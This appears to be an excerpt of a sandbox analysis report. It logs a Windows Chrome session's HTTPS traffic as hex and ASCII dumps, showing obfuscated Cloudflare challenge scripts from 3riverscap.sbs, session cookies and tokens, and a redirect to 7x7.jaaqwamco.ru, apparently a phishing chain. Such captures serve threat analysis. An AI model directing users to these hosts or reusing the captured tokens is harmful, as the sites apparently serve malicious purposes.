                                                                              2024-11-26 19:54:34 UTC1369INData Raw: 5b 5a 28 34 38 31 29 5d 28 2b 61 74 6f 62 28 63 2e 74 29 29 2c 66 3d 4d 61 74 68 5b 5a 28 34 38 31 29 5d 28 44 61 74 65 5b 5a 28 34 36 37 29 5d 28 29 2f 31 65 33 29 2c 66 2d 65 3e 64 29 29 72 65 74 75 72 6e 21 5b 5d 3b 72 65 74 75 72 6e 21 21 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 63 2c 64 2c 61 30 2c 65 2c 66 2c 46 2c 47 29 7b 61 30 3d 58 2c 65 3d 68 5b 61 30 28 34 36 30 29 5d 2c 66 3d 65 2e 72 2c 46 3d 7b 27 77 70 27 3a 6e 5b 61 30 28 34 35 30 29 5d 28 4a 53 4f 4e 5b 61 30 28 35 34 32 29 5d 28 63 29 29 2c 27 73 27 3a 61 30 28 34 34 37 29 7d 2c 47 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 47 5b 61 30 28 35 30 32 29 5d 28 61 30 28 34 39 37 29 2c 61 30 28 34 33 39 29 2b 68 5b 61 30 28 34 33 34 29 5d 5b 61 30 28 35 30 30 29 5d 2b
                                                                              Data Ascii: [Z(481)](+atob(c.t)),f=Math[Z(481)](Date[Z(467)]()/1e3),f-e>d))return![];return!![]}function l(c,d,a0,e,f,F,G){a0=X,e=h[a0(460)],f=e.r,F={'wp':n[a0(450)](JSON[a0(542)](c)),'s':a0(447)},G=new XMLHttpRequest(),G[a0(502)](a0(497),a0(439)+h[a0(434)][a0(500)]+
                                                                              2024-11-26 19:54:34 UTC1369INData Raw: 34 34 29 29 3f 66 28 29 3a 68 5b 61 6a 28 34 34 36 29 5d 3f 69 5b 61 6a 28 34 34 36 29 5d 28 61 6a 28 35 31 31 29 2c 66 29 3a 28 46 3d 69 5b 61 6a 28 34 37 30 29 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 69 5b 61 6a 28 34 37 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 6c 29 7b 61 6c 3d 61 6a 2c 46 28 29 2c 69 5b 61 6c 28 35 32 34 29 5d 21 3d 3d 61 6c 28 35 34 34 29 26 26 28 69 5b 61 6c 28 34 37 30 29 5d 3d 46 2c 66 28 29 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 63 2c 61 64 2c 64 29 7b 66 6f 72 28 61 64 3d 58 2c 64 3d 5b 5d 3b 63 21 3d 3d 6e 75 6c 6c 3b 64 3d 64 5b 61 64 28 34 36 34 29 5d 28 4f 62 6a 65 63 74 5b 61 64 28 34 35 38 29 5d 28 63 29 29 2c 63 3d 4f 62 6a 65 63 74 5b 61 64 28 34 36 31 29 5d 28 63 29 29 3b 72 65 74 75 72 6e 20 64 7d 66 75
                                                                              Data Ascii: 44))?f():h[aj(446)]?i[aj(446)](aj(511),f):(F=i[aj(470)]||function(){},i[aj(470)]=function(al){al=aj,F(),i[al(524)]!==al(544)&&(i[al(470)]=F,f())})}function y(c,ad,d){for(ad=X,d=[];c!==null;d=d[ad(464)](Object[ad(458)](c)),c=Object[ad(461)](c));return d}fu
                                                                              2024-11-26 19:54:34 UTC1369INData Raw: 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 2c 25 32 62 2c 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 73 74 72 69 6e 67 2c 2f 69 6e 76 69 73 69 62 6c 65 2f 6a 73 64 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 64 59 63 49 37 3b 48 63 63 76 76 38 3b 74 66 75 68 33 3b 59 6c 70 54 30 3b 4c 43 4e 44 55 32 3b 75 6e 6e 59 61 33 3b 54 70 57 78 6b 37 3b 63 4f 4d 42 38 3b 73 4c 4e 77 44 34 3b 66 54 55 6e 36 3b 4e 78 56 6d 33 3b 49 58 46 56 79 33 3b 45 77 70 79 4b 33 3b 55 67 75 47 4e 34 3b 4c 6e 76 58 38 3b 69 44 61 68 33 3b 54 4f 64 42 52 31 2c 6d 73 67 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 30 2e 30 31 34 35 37 35 31 38 38 39 30 31 33 36 31 34 34 31 3a 31 37 33 32 36 34 38 32 39 30 3a 37 59 6c 48 65 52 38 36 43 45 32
                                                                              Data Ascii: -cgi/challenge-platform/h/,%2b,XMLHttpRequest,string,/invisible/jsd,_cf_chl_opt;dYcI7;Hccvv8;tfuh3;YlpT0;LCNDU2;unnYa3;TpWxk7;cOMB8;sLNwD4;fTUn6;NxVm3;IXFVy3;EwpyK3;UguGN4;LnvX8;iDah3;TOdBR1,msg,addEventListener,0.014575188901361441:1732648290:7YlHeR86CE2
                                                                              2024-11-26 19:54:34 UTC73INData Raw: 69 28 35 33 31 29 5d 28 66 29 2c 48 3d 7b 7d 2c 48 2e 72 3d 47 2c 48 2e 65 3d 6e 75 6c 6c 2c 48 7d 63 61 74 63 68 28 4a 29 7b 72 65 74 75 72 6e 20 49 3d 7b 7d 2c 49 2e 72 3d 7b 7d 2c 49 2e 65 3d 4a 2c 49 7d 7d 7d 28 29
                                                                              Data Ascii: i(531)](f),H={},H.r=G,H.e=null,H}catch(J){return I={},I.r={},I.e=J,I}}}()


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.1649723162.159.140.1604436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:35 UTC1012OUTPOST /cdn-cgi/challenge-platform/h/b/jsd/r/8e8c6e58cb1b43b2 HTTP/1.1
                                                                              Host: 3riverscap.sbs
                                                                              Connection: keep-alive
                                                                              Content-Length: 15971
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Content-Type: application/json
                                                                              Accept: */*
                                                                              Origin: https://3riverscap.sbs
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8; ytb85vtlLNEaqVL6bVF11vMjOx0=1732650872; cOiOxvrWexZRQxekKrp9NKmvZuY=1732737272; fDN0wTGJWkBMHpJQE2V96znAEWI=1C-4GTPbBUrQHKBauwyqV8q1W54
                                                                              2024-11-26 19:54:35 UTC15971OUTData Raw: 7b 22 77 70 22 3a 22 44 5a 6f 46 63 67 24 64 63 69 6f 63 70 51 65 24 4e 24 50 7a 62 46 67 35 7a 39 55 7a 45 59 45 77 77 67 64 24 43 53 7a 72 73 35 52 73 48 6f 7a 4a 72 31 6a 65 73 69 24 32 7a 70 4e 6f 2d 2b 5a 5a 7a 39 47 77 7a 34 7a 77 35 77 6f 24 7a 36 77 24 38 65 37 46 47 69 5a 4b 75 4c 46 72 73 42 5a 55 39 56 32 50 51 2d 58 46 38 42 63 33 55 6e 24 56 53 72 47 45 7a 63 6f 6f 78 45 4a 67 4b 2b 7a 4f 2d 2b 48 6b 4b 7a 6b 46 51 4a 7a 67 33 6f 7a 45 46 67 67 46 42 70 46 45 7a 24 73 7a 62 69 30 7a 24 6e 4b 7a 79 6c 64 39 2d 5a 31 24 39 47 2b 6f 7a 67 6c 4b 7a 67 65 6a 62 7a 6a 67 7a 24 4b 36 48 57 6f 4c 32 55 35 67 2d 67 24 6b 38 55 5a 53 63 42 54 49 6b 72 7a 59 46 67 45 61 6d 5a 7a 64 30 5a 73 51 48 72 74 36 2d 7a 6a 49 6b 47 42 59 39 46 7a 57 47 59 48 45
                                                                              Data Ascii: {"wp":"DZoFcg$dciocpQe$N$PzbFg5z9UzEYEwwgd$CSzrs5RsHozJr1jesi$2zpNo-+ZZz9Gwz4zw5wo$z6w$8e7FGiZKuLFrsBZU9V2PQ-XF8Bc3Un$VSrGEzcooxEJgK+zO-+HkKzkFQJzg3ozEFggFBpFEz$szbi0z$nKzyld9-Z1$9G+ozglKzgejbzjgz$K6HWoL2U5g-g$k8UZScBTIkrzYFgEamZzd0ZsQHrt6-zjIkGBY9FzWGYHE
                                                                              2024-11-26 19:54:36 UTC1296INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:35 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.3riverscap.sbs; Priority=High; HttpOnly; Secure; SameSite=None
                                                                              Set-Cookie: cf_clearance=fZ5M8QztQ1O1btGVXHiF0n6.r2jEkzfU8lRCpVQ0gPU-1732650875-1.2.1.1-Cmt5HD6jI71uI5uMWDDyv5QhDMM1u6Qb4TnE2nfAvv65ebSYAwzoBFM7FUpXC4NUxC_F96T3XH9yQ2MsQtVathH9TOkASGLRUaYU5Xmf_BBShJG.bTQjwsuprDiGTWxfkxAEqtAfGvVgKBRE_UBjsXVUxk7LIWNZtNp6Z7R3_job6Y2mkIClazK7Eh4msxpt0pe6EuTKDJI91iSD.pmOqSJh61oGHTe_V8nMaSmlUZa4ytJ1h0UjiBv0YiuLFl40C7Gos0CDXedd_Sv.zMmKU5VqKGRDmOIEjRVX5nZJ3BJB4fED32u7uPuv0DrapWUdzk0aPAw0XM1V2VifznNgbS.s_pbgTIVeas.3W9VEpGFCqJ6gQUyL.JxD89YD01vY; Path=/; Expires=Wed, 26-Nov-25 19:54:35 GMT; Domain=.3riverscap.sbs; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EhJ8uA%2B05xg77Cuv5PIyJjys5ieokbM9QK7zd7ZqM6PZ8N96UGot3IM6R%2BarFu8Esxi3K%2BTF7MdMZXJlH76ftTI%2B4GMoOA%2F%2F4pgStl1ZF5enITVZcwGQB5UYr5qU%2BtQZNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e652bf243b2-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:36 UTC194INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 32 36 26 73 65 6e 74 3d 31 32 26 72 65 63 76 3d 32 30 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 34 26 72 65 63 76 5f 62 79 74 65 73 3d 31 37 36 32 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 38 30 38 30 34 39 26 63 77 6e 64 3d 32 33 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 32 62 38 35 33 32 34 37 32 65 32 61 66 61 37 26 74 73 3d 35 35 31 26 78 3d 30 22 0d 0a 0d 0a
                                                                              Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1626&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2834&recv_bytes=17627&delivery_rate=1808049&cwnd=236&unsent_bytes=0&cid=52b8532472e2afa7&ts=551&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.1649728172.66.0.1584436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:36 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js? HTTP/1.1
                                                                              Host: 3riverscap.sbs
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8; ytb85vtlLNEaqVL6bVF11vMjOx0=1732650872; cOiOxvrWexZRQxekKrp9NKmvZuY=1732737272; fDN0wTGJWkBMHpJQE2V96znAEWI=1C-4GTPbBUrQHKBauwyqV8q1W54
                                                                              2024-11-26 19:54:37 UTC896INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:37 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 8775
                                                                              Connection: close
                                                                              cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                              x-content-type-options: nosniff
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=He8VYpXKfLT1iJc4do484yBEGr9hRTPyNNGJuEFlRFPT%2B70KNwswMKLP%2Fm1sLeJUzVS8GvWWdvOPLZGdYm7%2FgpeV5RsxmkpZzxHVlHhdrFpUAvEa%2FYY677JUeIrjmyIQKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e6eeba8238e-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1991&rtt_var=757&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1376&delivery_rate=1436301&cwnd=232&unsent_bytes=0&cid=5af6ba42bdf091a8&ts=486&x=0"
                                                                              2024-11-26 19:54:37 UTC473INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 58 2c 68 2c 69 2c 6a 2c 6b 2c 6f 2c 73 2c 42 2c 44 29 7b 58 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 57 2c 66 2c 67 29 7b 66 6f 72 28 57 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 2d 70 61 72 73 65 49 6e 74 28 57 28 34 30 32 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 57 28 34 35 35 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 57 28 34 35 30 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 57 28 34 37 32 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 57 28 34 38 30 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 57 28 33 39 39 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 57 28 34 30 35 29 29 2f 37 2b
                                                                              Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,j,k,o,s,B,D){X=b,function(d,e,W,f,g){for(W=b,f=d();!![];)try{if(g=-parseInt(W(402))/1*(parseInt(W(455))/2)+-parseInt(W(450))/3*(parseInt(W(472))/4)+-parseInt(W(480))/5*(parseInt(W(399))/6)+parseInt(W(405))/7+
                                                                              2024-11-26 19:54:37 UTC1369INData Raw: 27 2c 6a 5b 58 28 33 39 30 29 5d 3d 27 6e 27 2c 6a 5b 58 28 34 36 35 29 5d 3d 27 49 27 2c 6a 5b 58 28 34 36 33 29 5d 3d 27 62 27 2c 6b 3d 6a 2c 68 5b 58 28 33 39 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 46 2c 47 2c 48 2c 61 32 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 61 32 3d 58 2c 6e 75 6c 6c 3d 3d 3d 46 7c 7c 46 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 48 3b 66 6f 72 28 4a 3d 6e 28 46 29 2c 67 5b 61 32 28 34 36 39 29 5d 5b 61 32 28 34 38 32 29 5d 26 26 28 4a 3d 4a 5b 61 32 28 34 38 33 29 5d 28 67 5b 61 32 28 34 36 39 29 5d 5b 61 32 28 34 38 32 29 5d 28 46 29 29 29 2c 4a 3d 67 5b 61 32 28 34 34 36 29 5d 5b 61 32 28 34 37 31 29 5d 26 26 67 5b 61 32 28 33 37 38 29 5d 3f 67 5b 61 32 28 34 34 36 29 5d 5b 61 32 28 34 37 31 29 5d 28 6e
                                                                              Data Ascii: ',j[X(390)]='n',j[X(465)]='I',j[X(463)]='b',k=j,h[X(397)]=function(g,F,G,H,a2,J,K,L,M,N,O){if(a2=X,null===F||F===void 0)return H;for(J=n(F),g[a2(469)][a2(482)]&&(J=J[a2(483)](g[a2(469)][a2(482)](F))),J=g[a2(446)][a2(471)]&&g[a2(378)]?g[a2(446)][a2(471)](n
                                                                              2024-11-26 19:54:37 UTC1369INData Raw: 66 28 33 39 34 29 5d 5b 61 66 28 34 30 37 29 5d 5b 61 66 28 34 31 34 29 5d 28 4a 2c 55 29 29 4c 3d 55 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 66 28 33 39 34 29 5d 5b 61 66 28 34 30 37 29 5d 5b 61 66 28 34 31 34 29 5d 28 4b 2c 4c 29 29 7b 69 66 28 32 35 36 3e 4c 5b 61 66 28 34 33 38 29 5d 28 30 29 29 7b 66 6f 72 28 49 3d 30 3b 49 3c 4f 3b 51 3c 3c 3d 31 2c 47 2d 31 3d 3d 52 3f 28 52 3d 30 2c 50 5b 61 66 28 34 37 35 29 5d 28 48 28 51 29 29 2c 51 3d 30 29 3a 52 2b 2b 2c 49 2b 2b 29 3b 66 6f 72 28 56 3d 4c 5b 61 66 28 34 33 38 29 5d 28 30 29 2c 49 3d 30 3b 38 3e 49 3b 51 3d 51 3c 3c 31 2e 30 34 7c 31 26 56 2c 47 2d 31 3d 3d 52 3f 28 52 3d 30 2c 50 5b 61 66 28 34 37 35 29 5d 28 48 28 51 29 29 2c 51 3d 30 29 3a 52 2b 2b 2c 56 3e 3e 3d 31 2c 49 2b 2b
                                                                              Data Ascii: f(394)][af(407)][af(414)](J,U))L=U;else{if(Object[af(394)][af(407)][af(414)](K,L)){if(256>L[af(438)](0)){for(I=0;I<O;Q<<=1,G-1==R?(R=0,P[af(475)](H(Q)),Q=0):R++,I++);for(V=L[af(438)](0),I=0;8>I;Q=Q<<1.04|1&V,G-1==R?(R=0,P[af(475)](H(Q)),Q=0):R++,V>>=1,I++
                                                                              2024-11-26 19:54:37 UTC1369INData Raw: 64 2c 46 3d 3d 6e 75 6c 6c 3f 27 27 3a 27 27 3d 3d 46 3f 6e 75 6c 6c 3a 66 2e 69 28 46 5b 61 67 28 34 35 31 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 47 2c 61 68 29 7b 72 65 74 75 72 6e 20 61 68 3d 61 67 2c 46 5b 61 68 28 34 33 38 29 5d 28 47 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 46 2c 47 2c 48 2c 61 69 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 54 2c 56 2c 55 29 7b 66 6f 72 28 61 69 3d 61 64 2c 49 3d 5b 5d 2c 4a 3d 34 2c 4b 3d 34 2c 4c 3d 33 2c 4d 3d 5b 5d 2c 50 3d 48 28 30 29 2c 51 3d 47 2c 52 3d 31 2c 4e 3d 30 3b 33 3e 4e 3b 49 5b 4e 5d 3d 4e 2c 4e 2b 3d 31 29 3b 66 6f 72 28 53 3d 30 2c 54 3d 4d 61 74 68 5b 61 69 28 34 34 35 29 5d 28 32 2c 32 29 2c 4f 3d 31 3b 54 21 3d 4f 3b 55 3d 51 26 50 2c 51 3e
                                                                              Data Ascii: d,F==null?'':''==F?null:f.i(F[ag(451)],32768,function(G,ah){return ah=ag,F[ah(438)](G)})},'i':function(F,G,H,ai,I,J,K,L,M,N,O,P,Q,R,S,T,V,U){for(ai=ad,I=[],J=4,K=4,L=3,M=[],P=H(0),Q=G,R=1,N=0;3>N;I[N]=N,N+=1);for(S=0,T=Math[ai(445)](2,2),O=1;T!=O;U=Q&P,Q>
                                                                              2024-11-26 19:54:37 UTC1369INData Raw: 69 64 2c 73 74 72 69 6e 67 69 66 79 2c 48 6c 74 73 65 48 4b 65 71 6c 65 4e 2c 65 72 72 6f 72 2c 6f 70 65 6e 2c 62 6f 6f 6c 65 61 6e 2c 63 46 50 57 76 2c 62 69 67 69 6e 74 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 64 59 63 49 37 3b 48 63 63 76 76 38 3b 74 66 75 68 33 3b 59 6c 70 54 30 3b 4c 43 4e 44 55 32 3b 75 6e 6e 59 61 33 3b 54 70 57 78 6b 37 3b 63 4f 4d 42 38 3b 73 4c 4e 77 44 34 3b 66 54 55 6e 36 3b 4e 78 56 6d 33 3b 49 58 46 56 79 33 3b 45 77 70 79 4b 33 3b 55 67 75 47 4e 34 3b 4c 6e 76 58 38 3b 69 44 61 68 33 3b 54 4f 64 42 52 31 2c 63 68 61 72 41 74 2c 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 4f 62 6a 65 63 74 2c 30 2e 31 36 37 37 31 34 33 32 35 37 31 36 34 37 32 30 35 3a 31 37 33 32 36 34 38 32 39 34 3a 2d 35 54 31 53 75 53 78 7a 4f 6e 38 58 70 37 61
                                                                              Data Ascii: id,stringify,HltseHKeqleN,error,open,boolean,cFPWv,bigint,_cf_chl_opt;dYcI7;Hccvv8;tfuh3;YlpT0;LCNDU2;unnYa3;TpWxk7;cOMB8;sLNwD4;fTUn6;NxVm3;IXFVy3;EwpyK3;UguGN4;LnvX8;iDah3;TOdBR1,charAt,Content-Type,Object,0.16771432571647205:1732648294:-5T1SuSxzOn8Xp7a
                                                                              2024-11-26 19:54:37 UTC1369INData Raw: 53 74 72 69 6e 67 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 62 69 6e 64 2c 65 72 72 6f 72 20 6f 6e 20 63 66 5f 63 68 6c 5f 70 72 6f 70 73 2c 61 70 69 27 2e 73 70 6c 69 74 28 27 2c 27 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 6e 7d 2c 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 61 6a 2c 64 2c 65 2c 66 2c 67 2c 46 29 7b 69 66 28 61 6a 3d 58 2c 64 3d 68 5b 61 6a 28 33 38 37 29 5d 2c 21 64 29 72 65 74 75 72 6e 3b 69 66 28 21 79 28 29 29 72 65 74 75 72 6e 3b 28 65 3d 21 5b 5d 2c 66 3d 64 5b 61 6a 28 34 34 33 29 5d 3d 3d 3d 21 21 5b 5d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 61 6b 2c 47 29 7b 28 61 6b 3d 61 6a 2c 21 65 29 26 26 28 65 3d 21 21 5b 5d 2c 47 3d 76 28 29 2c 7a 28 47 2e 72 2c 66 75 6e 63 74 69 6f 6e 28 48 29 7b 45
                                                                              Data Ascii: String,addEventListener,bind,error on cf_chl_props,api'.split(','),a=function(){return an},a()}function C(aj,d,e,f,g,F){if(aj=X,d=h[aj(387)],!d)return;if(!y())return;(e=![],f=d[aj(443)]===!![],g=function(ak,G){(ak=aj,!e)&&(e=!![],G=v(),z(G.r,function(H){E
                                                                              2024-11-26 19:54:37 UTC1369INData Raw: 3f 28 46 3d 7b 7d 2c 46 5b 61 6d 28 33 39 38 29 5d 3d 44 2c 46 5b 61 6d 28 34 35 38 29 5d 3d 66 2e 72 2c 46 5b 61 6d 28 33 39 36 29 5d 3d 61 6d 28 34 32 32 29 2c 68 5b 61 6d 28 33 39 33 29 5d 5b 61 6d 28 34 32 33 29 5d 28 46 2c 27 2a 27 29 29 3a 28 47 3d 7b 7d 2c 47 5b 61 6d 28 33 39 38 29 5d 3d 44 2c 47 5b 61 6d 28 34 35 38 29 5d 3d 66 2e 72 2c 47 5b 61 6d 28 33 39 36 29 5d 3d 61 6d 28 34 36 31 29 2c 47 5b 61 6d 28 34 33 30 29 5d 3d 67 2c 68 5b 61 6d 28 33 39 33 29 5d 5b 61 6d 28 34 32 33 29 5d 28 47 2c 27 2a 27 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 64 2c 61 30 2c 65 29 7b 66 6f 72 28 61 30 3d 58 2c 65 3d 5b 5d 3b 64 21 3d 3d 6e 75 6c 6c 3b 65 3d 65 5b 61 30 28 34 38 33 29 5d 28 4f 62 6a 65 63 74 5b 61 30 28 34 38 34 29 5d 28 64 29 29 2c 64 3d 4f
                                                                              Data Ascii: ?(F={},F[am(398)]=D,F[am(458)]=f.r,F[am(396)]=am(422),h[am(393)][am(423)](F,'*')):(G={},G[am(398)]=D,G[am(458)]=f.r,G[am(396)]=am(461),G[am(430)]=g,h[am(393)][am(423)](G,'*')))}function n(d,a0,e){for(a0=X,e=[];d!==null;e=e[a0(483)](Object[a0(484)](d)),d=O
                                                                              2024-11-26 19:54:37 UTC88INData Raw: 28 34 33 33 29 3d 3d 47 3f 6c 28 65 2c 67 5b 46 5d 29 3f 27 4e 27 3a 27 66 27 3a 6b 5b 47 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 64 2c 61 36 29 7b 72 65 74 75 72 6e 20 61 36 3d 58 2c 4d 61 74 68 5b 61 36 28 33 38 34 29 5d 28 29 3c 64 7d 7d 28 29
                                                                              Data Ascii: (433)==G?l(e,g[F])?'N':'f':k[G]||'?')}function x(d,a6){return a6=X,Math[a6(384)]()<d}}()


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.1649731172.67.180.1924436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:37 UTC687OUTGET /Sb3OEcu/ HTTP/1.1
                                                                              Host: 7x7.jaaqwamco.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: https://3riverscap.sbs/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:38 UTC1223INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: no-cache, private
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JV4xuroMpylB4BjmJf8n9l8KNSGS84%2FiQGHUWOfV%2FN0vMSv6b%2BMkp5mhO1I0T2eOQ87puD%2FDUFJgf3u1Tppm6Bx%2F3wzWdTRA3nsbwJMd%2F6SeSffzBirmyzrHGXxWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1543&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1590&delivery_rate=2582375&cwnd=252&unsent_bytes=0&cid=c2b3f9602aa015bb&ts=320&x=0"
